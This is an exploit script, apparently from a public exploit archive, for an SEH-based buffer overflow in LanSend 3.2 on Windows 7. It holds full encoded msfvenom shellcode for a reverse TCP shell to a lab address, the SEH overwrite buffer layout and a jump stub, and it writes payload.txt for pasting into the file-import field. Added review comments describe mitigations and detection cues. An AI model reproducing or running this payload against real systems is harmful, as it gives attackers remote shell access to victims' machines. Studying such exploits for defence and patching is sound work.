# Exploit Title: LanSend 3.2 - Buffer Overflow (SEH)
# Exploit Author: gurbanli
# Date: 2020-05-12
# Vulnerable Software: LanSend 3.2
# Vendor Homepage: https://lizardsystems.com
# Version: 3.2
# Software Link: https://lizardsystems.com/download/lansend_setup.exe
# Tested on: Windows 7 x86
#
# PoC
# 1. Run exploit
# 2. Run Lansend and Click Add Computers Wizard
# 3. Choose import computers from file
# 4. Copy/paste payload.txt content into filename section
# 5. shellcode will be executed
#
# Review notes:
# - As far as this PoC shows, the filename field of the "import computers
#   from file" step accepts input long enough to overwrite an SEH record.
#   The vendor-side fix for this class is a length check on that field.
#   NOTE(review): the page names no fixed version.
# - The handler value 0x00417a47 sits in the low 0x0040xxxx range, which
#   suggests (not confirmed here) an address inside the main executable
#   image, loaded at a fixed base and accepted as a handler. SafeSEH and
#   ASLR opt-in at link time, plus SEHOP on the host, are the standard
#   mitigations for SEH overwrites.
# - Per the msfvenom command line below, the shellcode is a reverse TCP
#   shell to 172.16.74.128:4444 (an RFC 1918 lab address). The LanSend
#   process opening an outbound TCP connection or spawning a command
#   shell is the behaviour to alert on.
# - Python 2 script: file() and str + bytes concatenation are Python 2
#   semantics.

# msfvenom -p windows/shell_reverse_tcp lhost=172.16.74.128 lport=4444 EXITFUNC=thread -f py -v shellcode -e x86/shikata_ga_nai -b '\x00\x0a\x0d'
shellcode = (
    b""
    b"\xda\xd0\xd9\x74\x24\xf4\x58\xbe\xa4\x95\xaf"
    b"\xc4\x2b\xc9\xb1\x52\x31\x70\x17\x03\x70\x17"
    b"\x83\x4c\x69\x4d\x31\x70\x7a\x10\xba\x88\x7b"
    b"\x75\x32\x6d\x4a\xb5\x20\xe6\xfd\x05\x22\xaa"
    b"\xf1\xee\x66\x5e\x81\x83\xae\x51\x22\x29\x89"
    b"\x5c\xb3\x02\xe9\xff\x37\x59\x3e\xdf\x06\x92"
    b"\x33\x1e\x4e\xcf\xbe\x72\x07\x9b\x6d\x62\x2c"
    b"\xd1\xad\x09\x7e\xf7\xb5\xee\x37\xf6\x94\xa1"
    b"\x4c\xa1\x36\x40\x80\xd9\x7e\x5a\xc5\xe4\xc9"
    b"\xd1\x3d\x92\xcb\x33\x0c\x5b\x67\x7a\xa0\xae"
    b"\x79\xbb\x07\x51\x0c\xb5\x7b\xec\x17\x02\x01"
    b"\x2a\x9d\x90\xa1\xb9\x05\x7c\x53\x6d\xd3\xf7"
    b"\x5f\xda\x97\x5f\x7c\xdd\x74\xd4\x78\x56\x7b"
    b"\x3a\x09\x2c\x58\x9e\x51\xf6\xc1\x87\x3f\x59"
    b"\xfd\xd7\x9f\x06\x5b\x9c\x32\x52\xd6\xff\x5a"
    b"\x97\xdb\xff\x9a\xbf\x6c\x8c\xa8\x60\xc7\x1a"
    b"\x81\xe9\xc1\xdd\xe6\xc3\xb6\x71\x19\xec\xc6"
    b"\x58\xde\xb8\x96\xf2\xf7\xc0\x7c\x02\xf7\x14"
    b"\xd2\x52\x57\xc7\x93\x02\x17\xb7\x7b\x48\x98"
    b"\xe8\x9c\x73\x72\x81\x37\x8e\x15\x02\xd7\xda"
    b"\x65\x32\xda\xda\x74\x9f\x53\x3c\x1c\x0f\x32"
    b"\x97\x89\xb6\x1f\x63\x2b\x36\x8a\x0e\x6b\xbc"
    b"\x39\xef\x22\x35\x37\xe3\xd3\xb5\x02\x59\x75"
    b"\xc9\xb8\xf5\x19\x58\x27\x05\x57\x41\xf0\x52"
    b"\x30\xb7\x09\x36\xac\xee\xa3\x24\x2d\x76\x8b"
    b"\xec\xea\x4b\x12\xed\x7f\xf7\x30\xfd\xb9\xf8"
    b"\x7c\xa9\x15\xaf\x2a\x07\xd0\x19\x9d\xf1\x8a"
    b"\xf6\x77\x95\x4b\x35\x48\xe3\x53\x10\x3e\x0b"
    b"\xe5\xcd\x07\x34\xca\x99\x8f\x4d\x36\x3a\x6f"
    b"\x84\xf2\x5a\x92\x0c\x0f\xf3\x0b\xc5\xb2\x9e"
    b"\xab\x30\xf0\xa6\x2f\xb0\x89\x5c\x2f\xb1\x8c"
    b"\x19\xf7\x2a\xfd\x32\x92\x4c\x52\x32\xb7"
)

# Seven-byte stub, disassembly as given by the author:
# 047FFF09  59       POP ECX
# 047FFF0A  59       POP ECX
# 047FFF0B  80C1 64  ADD CL,64
# 047FFF0E ^FFE1     JMP ECX
# NOTE(review): where JMP ECX lands depends on the stack contents at crash
# time, which this listing does not show.
jmp_to_shellcode = '\x59\x59\x80\xc1\x64\xff\xe1'

# Pieces of the buffer, in the order they are concatenated.
nop_pad = '\x90' * 30
filler = 'A' * 12
# Next-SEH field: EB EB is a short jump of -21 from the following
# instruction, i.e. 19 bytes back, which is the start of jmp_to_shellcode
# (7 stub bytes + 12 filler bytes).
next_seh = '\xeb\xeb\x90\x90'
# ppr 00417a47 -- little-endian, only three bytes written; the top 0x00
# byte is presumably supplied by the target (e.g. the string terminator).
seh_handler = '\x47\x7a\x41'

payload = nop_pad + shellcode + jmp_to_shellcode + filler + next_seh + seh_handler

# The buffer is only written to disk; delivery is the manual paste in step 4.
with file('payload.txt', 'w') as out:
    out.write(payload)